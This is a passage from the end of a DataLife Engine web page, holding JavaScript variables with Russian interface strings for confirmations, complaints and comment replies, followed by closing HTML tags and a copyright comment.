var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
